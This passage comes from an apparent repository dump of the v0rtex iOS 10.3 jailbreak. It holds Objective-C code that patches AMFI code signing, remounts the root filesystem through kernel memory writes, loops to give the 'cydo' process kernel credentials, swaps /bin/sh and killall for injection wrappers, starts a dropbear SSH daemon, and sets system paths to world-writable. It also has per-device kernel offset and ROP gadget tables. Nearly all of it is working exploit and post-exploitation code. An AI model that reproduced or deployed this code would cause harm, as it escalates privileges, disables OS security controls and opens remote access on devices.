stringByAppendingString:@"/extrainst_"] 381 | toPath:@"/v0rtex/extrainst_" error: &error]; 382 | if (error) NSLog(@"Error: %@", error); 383 | 384 | [fileMgr removeItemAtPath:@"/usr/libexec/cydia/cydo" error:nil]; 385 | [fileMgr copyItemAtPath:[bundlePath stringByAppendingString:@"/cydo"] 386 | toPath:@"/usr/libexec/cydia/cydo" error: &error]; 387 | if (error) NSLog(@"Error: %@", error); 388 | 389 | [fileMgr copyItemAtPath:[bundlePath stringByAppendingString:@"/bash"] 390 | toPath:@"/bin/sh" error: &error]; 391 | if (error) NSLog(@"Error: %@", error); 392 | 393 | // make sure all our bins have perms 394 | chmod("/v0rtex/dropbear", 0777); 395 | chmod("/v0rtex/tar", 0777); 396 | chmod("/bin/sh", 0777); 397 | chmod("/v0rtex/extrainst_", 0777); 398 | chmod("/usr/libexec/cydia/cydo", 0777); 399 | 400 | // create dir's and files for dropbear 401 | mkdir("/etc", 0777); 402 | mkdir("/etc/dropbear", 0777); 403 | mkdir("/var", 0777); 404 | mkdir("/var/log", 0777); 405 | FILE *lastLog = fopen("/var/log/lastlog", "ab+"); 406 | fclose(lastLog); 407 | } 408 | 409 | { 410 | //first amfi patch: for v0rtex files 411 | int amfi = patch_amfi(tfp0, kslide, YES, [self.hastweaks isOn]); 412 | [self writeText:[NSString stringWithFormat:@"v0rtex amfi: %d", amfi]]; 413 | } 414 | 415 | { 416 | //installed? 417 | int f = open("/.installed_v0rtexb4", O_RDONLY); 418 | 419 | if (f == -1 || [self.reinstallcydia isOn]) { 420 | system("rm -rf /var/lib/dpkg && ln -sf /.dpkg/dpkg /var/lib/dpkg"); //if we have an older version remove it 421 | // extract bootstrap.tar 422 | execprog(tfp0, kslide, 0, "/v0rtex/tar", (const char **)&(const char*[]){ "/v0rtex/tar", "--preserve-permissions", "--no-overwrite-dir", "-xvf", "/v0rtex/bootstrap.tar", "-C", "/", NULL }); 423 | 424 | //trust all the binaries 425 | 426 | open("/.installed_v0rtexb4", O_RDWR|O_CREAT); 427 | open("/.cydia_no_stash",O_RDWR|O_CREAT); 428 | 429 | //system("/usr/bin/uicache"); 430 | system("killall -SIGSTOP cfprefsd"); 431 | NSMutableDictionary* md = [[NSMutableDictionary alloc] initWithContentsOfFile:@"/var/mobile/Library/Preferences/com.apple.springboard.plist"]; 432 | [md setObject:[NSNumber numberWithBool:YES] forKey:@"SBShowNonDefaultSystemApps"]; 433 | [md writeToFile:@"/var/mobile/Library/Preferences/com.apple.springboard.plist" atomically:YES]; 434 | system("killall -9 cfprefsd"); 435 | } 436 | } 437 | 438 | { 439 | 440 | chmod("/private", 0777); 441 | chmod("/private/var", 0777); 442 | chmod("/private/var/mobile", 0777); 443 | chmod("/private/var/mobile/Library", 0777); 444 | chmod("/private/var/mobile/Library/Preferences", 0777); 445 | chmod("/private/var/mobile/Library/Preferences/com.apple.springboard.plist", 0600); //rw/-/- 446 | chown("/private/var/mobile/Library/Preferences/com.apple.springboard.plist", 501, 501); //mobile 447 | 448 | } 449 | 450 | { 451 | //second amfi patch, binaries, tweaks & Cydia 452 | int amfi2 = patch_amfi(tfp0, kslide, NO, [self.hastweaks isOn]); 453 | [self writeText:[NSString stringWithFormat:@"cydia amfi: %d", amfi2]]; 454 | system("/v0rtex/extrainst_"); //taken from substrate, patched the move.sh string so it doesn't stash 455 | dispatch_async(dispatch_get_global_queue(DISPATCH_QUEUE_PRIORITY_DEFAULT, 0), ^{ 456 | NSLog(@"cleaning up..."); 457 | [fileMgr removeItemAtPath:@"/v0rtex/bins" error:nil]; 458 | [fileMgr removeItemAtPath:@"/v0rtex/bootstrap.tar" error:nil]; 459 | [fileMgr removeItemAtPath:@"/v0rtex/bootstrap2.tar" error:nil]; 460 | [fileMgr removeItemAtPath:@"/v0rtex/dropbear" error:nil]; 461 | [fileMgr removeItemAtPath:@"/v0rtex/start.sh" error:nil]; 462 | [fileMgr removeItemAtPath:@"/v0rtex/tar" error:nil]; 463 | [fileMgr removeItemAtPath:@"/v0rtex/extrainst_" error:nil]; 464 | [fileMgr removeItemAtPath:@"/v0rtex/postinst" error:nil]; 465 | [fileMgr removeItemAtPath:@"/v0rtex/prerm" error:nil]; 466 | 467 | chmod("/Library/LaunchDaemons/dropbear.plist", 0644); 468 | chown("/Library/LaunchDaemons/dropbear.plist", 0, 0); 469 | chmod("/Library/LaunchDaemons/com.saurik.Cydia.Startup.plist", 0644); 470 | chown("/Library/LaunchDaemons/com.saurik.Cydia.Startup.plist", 0, 0); 471 | chmod("/Library/LaunchDaemons/0.reload.plist", 0644); 472 | chown("/Library/LaunchDaemons/0.reload.plist", 0, 0); 473 | system("launchctl load /Library/LaunchDaemons/dropbear.plist"); 474 | system("launchctl load /Library/LaunchDaemons/com.saurik.Cydia.Startup.plist"); 475 | system("echo 'string=$(ps aux | grep $1 | grep -v grep | grep -v pidof | grep -v pidsof); list=(${string}); for pid in ${!list[@]}; do ((pid == 1)) && printf \"${list[$pid]}\"; done' > /usr/bin/pidof; chmod 777 /usr/bin/pidof"); 476 | if ([self.shallrespring isOn]) { 477 | system("echo 'killall SpringBoard' > /usr/libexec/reload"); 478 | } 479 | else { 480 | system("echo 'killall nothing' > /usr/libexec/reload"); 481 | } 482 | if (self.method.selectedSegmentIndex == 0) { 483 | NSLog(@"doing method 1"); 484 | system("printf \"#/bin/bash\\nif [ \\$# -eq \"2\" ]; then\\nkillall_ \\$1 \\$2 && cynject \\$(pidof System/Library/CoreServices/SpringBoard.app/SpringBoard) /Library/MobileSubstrate/MobileSubstrate.dylib\\nelif [ \\$# -eq \"1\" ]; then\\nkillall_ \\$1 && cynject \\$(pidof System/Library/CoreServices/SpringBoard.app/SpringBoard) /Library/MobileSubstrate/MobileSubstrate.dylib\\nfi\" > /usr/bin/killall"); 485 | } 486 | else { 487 | NSLog(@"doing method 2"); 488 | system("printf \"#/bin/bash\\nif [ \\$# -eq \"2\" ]; then\\nkillall_ \\$1 \\$2\\nfor i in /Library/MobileSubstrate/DynamicLibraries/*.dylib\\ndo\\ncynject \\$(pidof System/Library/CoreServices/SpringBoard.app/SpringBoard) \\$i\\ndone\\nelif [ \\$# -eq \"1\" ]; then\\nkillall_ \\$1\\nfor i in /Library/MobileSubstrate/DynamicLibraries/*.dylib\\ndo\\ncynject \\$(pidof System/Library/CoreServices/SpringBoard.app/SpringBoard) \\$i\\ndone\\nfi\" > /usr/bin/killall"); 489 | } 490 | 491 | if ([self.hastweaks isOn]) { 492 | system("launchctl unload /Library/LaunchDaemons/0.reload.plist"); 493 | system("launchctl load /Library/LaunchDaemons/0.reload.plist"); 494 | } 495 | }); 496 | 497 | 498 | } 499 | 500 | 501 | // Done. 502 | [self writeText:@""]; 503 | [self writeText:@"done."]; //logging does not work now for now 504 | sleep(3); 505 | extern void startJBD(void); 506 | startJBD(); 507 | } 508 | 509 | 510 | - (void)writeText:(NSString *)text { 511 | self.outputView.text = [self.outputView.text stringByAppendingString:[text stringByAppendingString:@"\n"]]; 512 | } 513 | 514 | @end 515 | -------------------------------------------------------------------------------- /v0rtex-S/bash: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/thisiswisy/v0rtex-injector/18a242c97ba0c4d45a553c78ef91cf9145e9e17e/v0rtex-S/bash -------------------------------------------------------------------------------- /v0rtex-S/bootstrap.tar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/thisiswisy/v0rtex-injector/18a242c97ba0c4d45a553c78ef91cf9145e9e17e/v0rtex-S/bootstrap.tar -------------------------------------------------------------------------------- /v0rtex-S/common.h: -------------------------------------------------------------------------------- 1 | #ifndef COMMON_H 2 | #define COMMON_H 3 | 4 | #include // uint*_t 5 | #include 6 | 7 | #define LOG(str, args...) do { NSLog(@str "\n", ##args); } while(0) 8 | 9 | #ifdef __LP64__ 10 | # define ADDR "0x%016llx" 11 | typedef uint64_t kptr_t; 12 | #else 13 | # define ADDR "0x%08x" 14 | typedef uint32_t kptr_t; 15 | #endif 16 | 17 | #endif 18 | -------------------------------------------------------------------------------- /v0rtex-S/cydia/jailbreakd.m: -------------------------------------------------------------------------------- 1 | // 2 | // ViewController.m 3 | // v0rtex 4 | // 5 | // Created by Jake James on 2017-12-07. 6 | // Copyright © 2017 cheesecakeufo, ninjaprawn, xerub. ALL RIGHTS DESERVED 7 | // THANK YOU CHEESECAKEUFO FOR THE IDEA AND CYDO 8 | 9 | #import "ViewController.h" 10 | 11 | #include "v0rtex.h" 12 | #include "kernel.h" 13 | #include "symbols.h" 14 | #include 15 | #include 16 | #include 17 | #include 18 | #include 19 | #include 20 | #include "patchfinder64.h" 21 | 22 | /* CODE IS AWFUL AND I KNOW IT, DO NOT COMPLAIN. 23 | NOT MY PRIORITY CLEANING IT UP */ 24 | 25 | extern task_t tfp0; 26 | extern kptr_t kern_ucred; 27 | 28 | #define CS_VALID 0x0000001 /* dynamically valid */ 29 | #define CS_ADHOC 0x0000002 /* ad hoc signed */ 30 | #define CS_GET_TASK_ALLOW 0x0000004 /* has get-task-allow entitlement */ 31 | #define CS_INSTALLER 0x0000008 /* has installer entitlement */ 32 | 33 | #define CS_HARD 0x0000100 /* don't load invalid pages */ 34 | #define CS_KILL 0x0000200 /* kill process if it becomes invalid */ 35 | #define CS_CHECK_EXPIRATION 0x0000400 /* force expiration checking */ 36 | #define CS_RESTRICT 0x0000800 /* tell dyld to treat restricted */ 37 | #define CS_ENFORCEMENT 0x0001000 /* require enforcement */ 38 | #define CS_REQUIRE_LV 0x0002000 /* require library validation */ 39 | #define CS_ENTITLEMENTS_VALIDATED 0x0004000 40 | 41 | #define CS_ALLOWED_MACHO 0x00ffffe 42 | 43 | #define CS_EXEC_SET_HARD 0x0100000 /* set CS_HARD on any exec'ed process */ 44 | #define CS_EXEC_SET_KILL 0x0200000 /* set CS_KILL on any exec'ed process */ 45 | #define CS_EXEC_SET_ENFORCEMENT 0x0400000 /* set CS_ENFORCEMENT on any exec'ed process */ 46 | #define CS_EXEC_SET_INSTALLER 0x0800000 /* set CS_INSTALLER on any exec'ed process */ 47 | 48 | #define CS_KILLED 0x1000000 /* was killed by kernel for invalidity */ 49 | #define CS_DYLD_PLATFORM 0x2000000 /* dyld used to load this is a platform binary */ 50 | #define CS_PLATFORM_BINARY 0x4000000 /* this is a platform binary */ 51 | #define CS_PLATFORM_PATH 0x8000000 /* platform binary by the fact of path (osx only) */ 52 | 53 | 54 | 55 | uint64_t procForName(char *name) { 56 | //THANK YOU NINJAPRAWN 57 | uint64_t proc = rk64(tfp0, find_allproc()); 58 | printf("\nINFO: proc: %llu", proc); 59 | while (proc) { 60 | char comm[40] = {0}; 61 | kread(proc + 0x26c, comm, 20); 62 | //uint32_t pid = (uint32_t)rk32_via_tfp0(tfp0, proc + 0x10); 63 | printf("\n%s's proc: %llu", comm, proc); 64 | if (strstr(comm, name)) { 65 | printf("\nINFO: success: process is: %s and proc is : %llu", comm, proc); 66 | return proc; 67 | } 68 | proc = rk64(tfp0, proc); 69 | } 70 | return -1; 71 | } 72 | kern_return_t empower_proc(uint64_t proc, uint64_t kern_ucred) { 73 | uint32_t csflags = rk32_via_tfp0(tfp0, proc + 0x2a8 /* csflags */); 74 | csflags = (csflags | CS_PLATFORM_BINARY | CS_INSTALLER | CS_GET_TASK_ALLOW) & ~(CS_RESTRICT | CS_KILL | CS_HARD); 75 | wk32(tfp0, proc + 0x2a8 /* csflags */, csflags); 76 | wk64(proc + 0x100 /* KSTRUCT_OFFSET_PROC_UCRED */, kern_ucred); 77 | 78 | return KERN_SUCCESS; 79 | } 80 | 81 | void startJBD() { 82 | 83 | for(;;) { 84 | //system("echo $(pidof cydo) > /var/mobile/cydopid.txt"); //pls don't complain about awful code I'm lazy 85 | //const char *pid = [[NSString stringWithContentsOfFile:@"/var/mobile/cydopid.txt" encoding:NSUTF8StringEncoding error:nil] UTF8String]; 86 | //NSLog(@"found pid is: %s", pid); 87 | // if (pid != NULL && pid != nil && strcmp(pid, "") != 0) { 88 | uint64_t target_proc = procForName("cydo"); 89 | // if (target_proc == -1) break; TODO: FIX THIS. Interrupts loop 90 | empower_proc(target_proc, kern_ucred); 91 | 92 | // } 93 | } 94 | } 95 | 96 | 97 | -------------------------------------------------------------------------------- /v0rtex-S/cydo: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/thisiswisy/v0rtex-injector/18a242c97ba0c4d45a553c78ef91cf9145e9e17e/v0rtex-S/cydo -------------------------------------------------------------------------------- /v0rtex-S/dropbear: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/thisiswisy/v0rtex-injector/18a242c97ba0c4d45a553c78ef91cf9145e9e17e/v0rtex-S/dropbear -------------------------------------------------------------------------------- /v0rtex-S/extrainst_: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/thisiswisy/v0rtex-injector/18a242c97ba0c4d45a553c78ef91cf9145e9e17e/v0rtex-S/extrainst_ -------------------------------------------------------------------------------- /v0rtex-S/kernel.h: -------------------------------------------------------------------------------- 1 | // 2 | // kernel.h 3 | // v0rtex-s 4 | // 5 | // Created by Ben on 16/12/2017. 6 | // Copyright © 2017 Sticktron. All rights reserved. 7 | // 8 | 9 | #include 10 | void init_kernel(task_t task_for_port0); 11 | uint64_t rk64(task_t tfp0, uint64_t kaddr); 12 | uint32_t rk32_via_tfp0(task_t tfp0, uint64_t kaddr); 13 | void wk32(task_t tfp0, uint64_t kaddr, uint32_t val); 14 | void wk64(uint64_t kaddr, uint64_t val); 15 | kern_return_t mach_vm_write( 16 | vm_map_t target_task, 17 | mach_vm_address_t address, 18 | vm_offset_t data, 19 | mach_msg_type_number_t dataCnt); 20 | 21 | kern_return_t mach_vm_read_overwrite( 22 | vm_map_t target_task, 23 | mach_vm_address_t address, 24 | mach_vm_size_t size, 25 | mach_vm_address_t data, 26 | mach_vm_size_t *outsize); 27 | 28 | size_t kread(uint64_t where, void *p, size_t size); 29 | size_t kwrite(uint64_t where, const void *p, size_t size); 30 | size_t kwrite_uint64(uint64_t where, uint64_t value); 31 | -------------------------------------------------------------------------------- /v0rtex-S/kernel.m: -------------------------------------------------------------------------------- 1 | // 2 | // kernel.m 3 | // v0rtex 4 | // 5 | // Created by Ben on 16/12/2017. 6 | // Copyright © 2017 Sticktron. All rights reserved. 7 | // 8 | 9 | #include "kernel.h" 10 | #include 11 | #include 12 | #include 13 | 14 | extern task_t tfp0; 15 | 16 | void init_kernel(task_t task_for_port0) { 17 | tfp0 = task_for_port0; 18 | } 19 | 20 | uint64_t rk64(task_t tfp0, uint64_t kaddr) { 21 | uint64_t lower = rk32_via_tfp0(tfp0, kaddr); 22 | uint64_t higher = rk32_via_tfp0(tfp0, kaddr + 4); 23 | return ((higher << 32) | lower); 24 | } 25 | 26 | uint32_t rk32_via_tfp0(task_t tfp0, uint64_t kaddr) { 27 | kern_return_t err; 28 | uint32_t val = 0; 29 | mach_vm_size_t outsize = 0; 30 | 31 | // mach (for kern r/w primitives) 32 | kern_return_t mach_vm_write( 33 | vm_map_t target_task, 34 | mach_vm_address_t address, 35 | vm_offset_t data, 36 | mach_msg_type_number_t dataCnt); 37 | 38 | err = mach_vm_read_overwrite(tfp0, 39 | (mach_vm_address_t)kaddr, 40 | (mach_vm_size_t)sizeof(uint32_t), 41 | (mach_vm_address_t)&val, 42 | &outsize); 43 | 44 | if (err != KERN_SUCCESS) { 45 | // printf("tfp0 read failed %s addr: 0x%llx err:%x port:%x\n", mach_error_string(err), kaddr, err, tfp0); 46 | // sleep(3); 47 | return 0; 48 | } 49 | 50 | if (outsize != sizeof(uint32_t)) { 51 | // printf("tfp0 read was short (expected %lx, got %llx\n", sizeof(uint32_t), outsize); 52 | // sleep(3); 53 | return 0; 54 | } 55 | 56 | return val; 57 | } 58 | 59 | void wk32(task_t tfp0, uint64_t kaddr, uint32_t val) { 60 | if (tfp0 == MACH_PORT_NULL) { 61 | // printf("attempt to write to kernel memory before any kernel memory write primitives available\n"); 62 | // sleep(3); 63 | return; 64 | } 65 | 66 | kern_return_t err; 67 | err = mach_vm_write(tfp0, 68 | (mach_vm_address_t)kaddr, 69 | (vm_offset_t)&val, 70 | (mach_msg_type_number_t)sizeof(uint32_t)); 71 | 72 | if (err != KERN_SUCCESS) { 73 | // printf("tfp0 write failed: %s %x\n", mach_error_string(err), err); 74 | return; 75 | } 76 | } 77 | 78 | 79 | 80 | void wk64(uint64_t kaddr, uint64_t val) { 81 | uint32_t lower = (uint32_t)(val & 0xffffffff); 82 | uint32_t higher = (uint32_t)(val >> 32); 83 | wk32(tfp0, kaddr, lower); 84 | wk32(tfp0, kaddr + 4, higher); 85 | } 86 | size_t kread(uint64_t where, void *p, size_t size) { 87 | int rv; 88 | size_t offset = 0; 89 | while (offset < size) { 90 | mach_vm_size_t sz, chunk = 2048; 91 | if (chunk > size - offset) { 92 | chunk = size - offset; 93 | } 94 | rv = mach_vm_read_overwrite(tfp0, where + offset, chunk, (mach_vm_address_t)p + offset, &sz); 95 | if (rv || sz == 0) { 96 | fprintf(stderr, "[e] error reading kernel @%p\n", (void *)(offset + where)); 97 | break; 98 | } 99 | offset += sz; 100 | } 101 | return offset; 102 | } 103 | 104 | size_t kwrite(uint64_t where, const void *p, size_t size) { 105 | int rv; 106 | size_t offset = 0; 107 | while (offset < size) { 108 | size_t chunk = 2048; 109 | if (chunk > size - offset) { 110 | chunk = size - offset; 111 | } 112 | rv = mach_vm_write(tfp0, 113 | where + offset, 114 | (mach_vm_offset_t)p + offset, 115 | (mach_msg_type_number_t)chunk); 116 | 117 | if (rv) { 118 | printf("[kernel] error copying buffer into region: @%p \n", (void *)(offset + where)); 119 | break; 120 | } 121 | 122 | offset +=chunk; 123 | } 124 | 125 | return offset; 126 | } 127 | 128 | 129 | size_t kwrite_uint64(uint64_t where, uint64_t value) { 130 | return kwrite(where, &value, sizeof(value)); 131 | } 132 | 133 | -------------------------------------------------------------------------------- /v0rtex-S/launchctl: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/thisiswisy/v0rtex-injector/18a242c97ba0c4d45a553c78ef91cf9145e9e17e/v0rtex-S/launchctl -------------------------------------------------------------------------------- /v0rtex-S/ls: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/thisiswisy/v0rtex-injector/18a242c97ba0c4d45a553c78ef91cf9145e9e17e/v0rtex-S/ls -------------------------------------------------------------------------------- /v0rtex-S/main.m: -------------------------------------------------------------------------------- 1 | // 2 | // main.m 3 | // v0rtex 4 | // 5 | // Created by Sticktron on 2017-12-07. 6 | // Copyright © 2017 Sticktron. All rights reserved. 7 | // 8 | 9 | #import 10 | #import "AppDelegate.h" 11 | 12 | int main(int argc, char * argv[]) { 13 | @autoreleasepool { 14 | return UIApplicationMain(argc, argv, nil, NSStringFromClass([AppDelegate class])); 15 | } 16 | } 17 | -------------------------------------------------------------------------------- /v0rtex-S/root-rw.h: -------------------------------------------------------------------------------- 1 | // 2 | // root-rw.h 3 | // v0rtex-s 4 | // 5 | // Created by Ben on 16/12/2017. 6 | // Copyright © 2017 Sticktron. All rights reserved. 7 | // 8 | 9 | #include 10 | #include 11 | 12 | int mount_root(task_t tfp0, uint64_t kslide); 13 | -------------------------------------------------------------------------------- /v0rtex-S/root-rw.m: -------------------------------------------------------------------------------- 1 | // 2 | // root-rw.m 3 | // v0rtex 4 | // 5 | // Created by Ben on 16/12/2017. 6 | // Copyright © 2017 Sticktron. All rights reserved. 7 | // 8 | 9 | #include "root-rw.h" 10 | #include "kernel.h" 11 | #include "symbols.h" 12 | 13 | // For '/' remount (not offsets) 14 | #define KSTRUCT_OFFSET_MOUNT_MNT_FLAG 0x70 15 | //#define KSTRUCT_OFFSET_MOUNT_MNT_FLAG 0xd8 16 | #define KSTRUCT_OFFSET_VNODE_V_UN 0xd8 17 | 18 | int mount_root(task_t tfp0, uint64_t kslide) { 19 | uint64_t _rootnode = OFFSET_ROOT_MOUNT_V_NODE + kslide; 20 | uint64_t rootfs_vnode = rk64(tfp0, _rootnode); 21 | 22 | // read the original flags 23 | uint64_t v_mount = rk64(tfp0, rootfs_vnode + KSTRUCT_OFFSET_VNODE_V_UN); 24 | uint32_t v_flag = rk32_via_tfp0(tfp0, v_mount + KSTRUCT_OFFSET_MOUNT_MNT_FLAG + 1); 25 | 26 | // unset rootfs flag 27 | wk32(tfp0, v_mount + KSTRUCT_OFFSET_MOUNT_MNT_FLAG + 1, v_flag & ~(MNT_ROOTFS >> 8)); 28 | 29 | // remount 30 | char *nmz = strdup("/dev/disk0s1s1"); 31 | kern_return_t rv = mount("hfs", "/", MNT_UPDATE, (void *)&nmz); 32 | 33 | // set original flags back 34 | v_mount = rk64(tfp0, rootfs_vnode + KSTRUCT_OFFSET_VNODE_V_UN); 35 | wk32(tfp0, v_mount + KSTRUCT_OFFSET_MOUNT_MNT_FLAG + 1, v_flag); 36 | 37 | return rv; 38 | } 39 | -------------------------------------------------------------------------------- /v0rtex-S/symbols.h: -------------------------------------------------------------------------------- 1 | // 2 | // symbols.h 3 | // v0rtex-s 4 | // 5 | // Created by Ben on 16/12/2017. 6 | // Copyright © 2017 Sticktron. All rights reserved. 7 | // 8 | 9 | #include 10 | #include 11 | #include 12 | #include 13 | #include "common.h" 14 | 15 | extern uint64_t OFFSET_ZONE_MAP; 16 | extern uint64_t OFFSET_KERNEL_MAP; 17 | extern uint64_t OFFSET_KERNEL_TASK; 18 | extern uint64_t OFFSET_REALHOST; 19 | extern uint64_t OFFSET_COPYIN; 20 | extern uint64_t OFFSET_COPYOUT; 21 | extern uint64_t OFFSET_CHGPROCCNT; 22 | extern uint64_t OFFSET_KAUTH_CRED_REF; 23 | extern uint64_t OFFSET_IPC_PORT_ALLOC_SPECIAL; 24 | extern uint64_t OFFSET_IPC_KOBJECT_SET; 25 | extern uint64_t OFFSET_IPC_PORT_MAKE_SEND; 26 | extern uint64_t OFFSET_OSSERIALIZER_SERIALIZE; 27 | extern uint64_t OFFSET_ROP_LDR_X0_X0_0x10; 28 | extern uint64_t OFFSET_ROOT_MOUNT_V_NODE; 29 | 30 | BOOL init_symbols(void); 31 | -------------------------------------------------------------------------------- /v0rtex-S/symbols.m: -------------------------------------------------------------------------------- 1 | // 2 | // symbols.m 3 | // v0rtex 4 | // 5 | // Created by Ben on 16/12/2017. 6 | // Copyright © 2017 Sticktron. All rights reserved. 7 | // 8 | 9 | #include 10 | #include "symbols.h" 11 | #include "common.h" 12 | 13 | uint64_t OFFSET_ZONE_MAP; 14 | uint64_t OFFSET_KERNEL_MAP; 15 | uint64_t OFFSET_KERNEL_TASK; 16 | uint64_t OFFSET_REALHOST; 17 | uint64_t OFFSET_COPYIN; 18 | uint64_t OFFSET_COPYOUT; 19 | uint64_t OFFSET_CHGPROCCNT; 20 | uint64_t OFFSET_KAUTH_CRED_REF; 21 | uint64_t OFFSET_IPC_PORT_ALLOC_SPECIAL; 22 | uint64_t OFFSET_IPC_KOBJECT_SET; 23 | uint64_t OFFSET_IPC_PORT_MAKE_SEND; 24 | uint64_t OFFSET_OSSERIALIZER_SERIALIZE; 25 | uint64_t OFFSET_ROP_LDR_X0_X0_0x10; 26 | uint64_t OFFSET_ROOT_MOUNT_V_NODE; 27 | 28 | BOOL init_symbols() 29 | { 30 | NSString *ver = [[NSProcessInfo processInfo] operatingSystemVersionString]; 31 | 32 | struct utsname u; 33 | uname(&u); 34 | 35 | LOG("sysname: %s", u.sysname); 36 | LOG("nodename: %s", u.nodename); 37 | LOG("release: %s", u.release); 38 | LOG("version: %s", u.version); 39 | LOG("machine: %s", u.machine); 40 | 41 | 42 | //5S 43 | if (strcmp(u.machine, "iPhone6,1") == 0 || strcmp(u.machine, "iPhone6,2") == 0) 44 | { 45 | if ([ver isEqual: @"Version 10.3.1 (Build 14E304)"]) 46 | { 47 | OFFSET_ZONE_MAP =0xfffffff00754c478; 48 | OFFSET_KERNEL_MAP =0xfffffff0075a8050; 49 | OFFSET_KERNEL_TASK =0xfffffff0075a8048; 50 | OFFSET_REALHOST =0xfffffff00752eba0; 51 | OFFSET_COPYIN =0xfffffff007181218; 52 | OFFSET_COPYOUT =0xfffffff00718140c; 53 | OFFSET_CHGPROCCNT =0xfffffff00738e504; 54 | OFFSET_KAUTH_CRED_REF =0xfffffff0073688a4; 55 | OFFSET_IPC_PORT_ALLOC_SPECIAL =0xfffffff007099f7c; 56 | OFFSET_IPC_KOBJECT_SET =0xfffffff0070ad1d4; 57 | OFFSET_IPC_PORT_MAKE_SEND =0xfffffff007099aa0; 58 | OFFSET_OSSERIALIZER_SERIALIZE =0xfffffff007441424; 59 | OFFSET_ROP_LDR_X0_X0_0x10 =0xfffffff006474a84; 60 | OFFSET_ROOT_MOUNT_V_NODE =0xfffffff0075a80b0; 61 | } 62 | else if ([ver isEqual: @"Version 10.3.3 (Build 14G60)"]) 63 | { 64 | OFFSET_ZONE_MAP =0xfffffff00754c478; 65 | OFFSET_KERNEL_MAP =0xfffffff0075a8050; 66 | OFFSET_KERNEL_TASK =0xfffffff0075a8048; 67 | OFFSET_REALHOST =0xfffffff00752eba0; 68 | OFFSET_COPYIN =0xfffffff007180e98; 69 | OFFSET_COPYOUT =0xfffffff00718108c; 70 | OFFSET_CHGPROCCNT =0xfffffff00738e77c; 71 | OFFSET_KAUTH_CRED_REF =0xfffffff007368b08; 72 | OFFSET_IPC_PORT_ALLOC_SPECIAL =0xfffffff007099f14; 73 | OFFSET_IPC_KOBJECT_SET =0xfffffff0070ad1ec; 74 | OFFSET_IPC_PORT_MAKE_SEND =0xfffffff007099a38; 75 | OFFSET_OSSERIALIZER_SERIALIZE =0xfffffff007441908; 76 | OFFSET_ROP_LDR_X0_X0_0x10 =0xfffffff006470a84; 77 | OFFSET_ROOT_MOUNT_V_NODE =0xfffffff0075a80b0; 78 | } 79 | else if ([ver isEqual: @"Version 10.3.2 (Build 14F89)"]) 80 | { 81 | OFFSET_ZONE_MAP =0xfffffff00754c478; 82 | OFFSET_KERNEL_MAP =0xfffffff0075a8050; 83 | OFFSET_KERNEL_TASK =0xfffffff0075a8048; 84 | OFFSET_REALHOST =0xfffffff00752eba0; 85 | OFFSET_COPYIN =0xfffffff0071811ec; 86 | OFFSET_COPYOUT =0xfffffff0071813e0; 87 | OFFSET_CHGPROCCNT =0xfffffff00738e82c; 88 | OFFSET_KAUTH_CRED_REF =0xfffffff007368be4; 89 | OFFSET_IPC_PORT_ALLOC_SPECIAL =0xfffffff007099f14; 90 | OFFSET_IPC_KOBJECT_SET =0xfffffff0070ad1ec; 91 | OFFSET_IPC_PORT_MAKE_SEND =0xfffffff007099a38; 92 | OFFSET_OSSERIALIZER_SERIALIZE =0xfffffff0074419b8; 93 | OFFSET_ROP_LDR_X0_X0_0x10 =0xfffffff006474a84; 94 | OFFSET_ROOT_MOUNT_V_NODE =0xfffffff0075a80b0; 95 | } 96 | else if ([ver isEqual: @"Version 10.3 (Build 14E277)"]) 97 | { 98 | OFFSET_ZONE_MAP =0xfffffff00754c478; 99 | OFFSET_KERNEL_MAP =0xfffffff0075a8050; 100 | OFFSET_KERNEL_TASK =0xfffffff0075a8048; 101 | OFFSET_REALHOST =0xfffffff00752eba0; 102 | OFFSET_COPYIN =0xfffffff007181218; 103 | OFFSET_COPYOUT =0xfffffff00718140c; 104 | OFFSET_CHGPROCCNT =0xfffffff00738e504; 105 | OFFSET_KAUTH_CRED_REF =0xfffffff0073688a4; 106 | OFFSET_IPC_PORT_ALLOC_SPECIAL =0xfffffff007099f7c; 107 | OFFSET_IPC_KOBJECT_SET =0xfffffff0070ad1d4; 108 | OFFSET_IPC_PORT_MAKE_SEND =0xfffffff007099aa0; 109 | OFFSET_OSSERIALIZER_SERIALIZE =0xfffffff007441424; 110 | OFFSET_ROP_LDR_X0_X0_0x10 =0xfffffff006474a84; 111 | OFFSET_ROOT_MOUNT_V_NODE =0xfffffff0075a80b0; 112 | } 113 | } 114 | 115 | //6 116 | else if (strcmp(u.machine, "iPhone7,1") == 0 || strcmp(u.machine, "iPhone7,2") == 0) 117 | { 118 | if ([ver isEqual: @"Version 10.3.1 (Build 14E304)"]) 119 | { 120 | 121 | OFFSET_ZONE_MAP =0xfffffff007558478; 122 | OFFSET_KERNEL_MAP =0xfffffff0075b4050; 123 | OFFSET_KERNEL_TASK =0xfffffff0075b4048; 124 | OFFSET_REALHOST =0xfffffff00753aba0; 125 | OFFSET_COPYIN =0xfffffff00718d3a8; 126 | OFFSET_COPYOUT =0xfffffff00718d59c; 127 | OFFSET_CHGPROCCNT =0xfffffff00739a78c; 128 | OFFSET_KAUTH_CRED_REF =0xfffffff007374b2c; 129 | OFFSET_IPC_PORT_ALLOC_SPECIAL =0xfffffff0070a611c; 130 | OFFSET_IPC_KOBJECT_SET =0xfffffff0070b9374; 131 | OFFSET_IPC_PORT_MAKE_SEND =0xfffffff0070a5c40; 132 | OFFSET_OSSERIALIZER_SERIALIZE =0xfffffff00744d6ac; 133 | OFFSET_ROP_LDR_X0_X0_0x10 =0xfffffff006404a84; 134 | OFFSET_ROOT_MOUNT_V_NODE =0xfffffff0075b40b0; 135 | 136 | } 137 | else if ([ver isEqual: @"Version 10.3 (Build 14E277)"]) 138 | { 139 | 140 | OFFSET_ZONE_MAP =0xfffffff007558478; 141 | OFFSET_KERNEL_MAP =0xfffffff0075b4050; 142 | OFFSET_KERNEL_TASK =0xfffffff0075b4048; 143 | OFFSET_REALHOST =0xfffffff00753aba0; 144 | OFFSET_COPYIN =0xfffffff00718d3a8; 145 | OFFSET_COPYOUT =0xfffffff00718d59c; 146 | OFFSET_CHGPROCCNT =0xfffffff00739a78c; 147 | OFFSET_KAUTH_CRED_REF =0xfffffff007374b2c; 148 | OFFSET_IPC_PORT_ALLOC_SPECIAL =0xfffffff0070a611c; 149 | 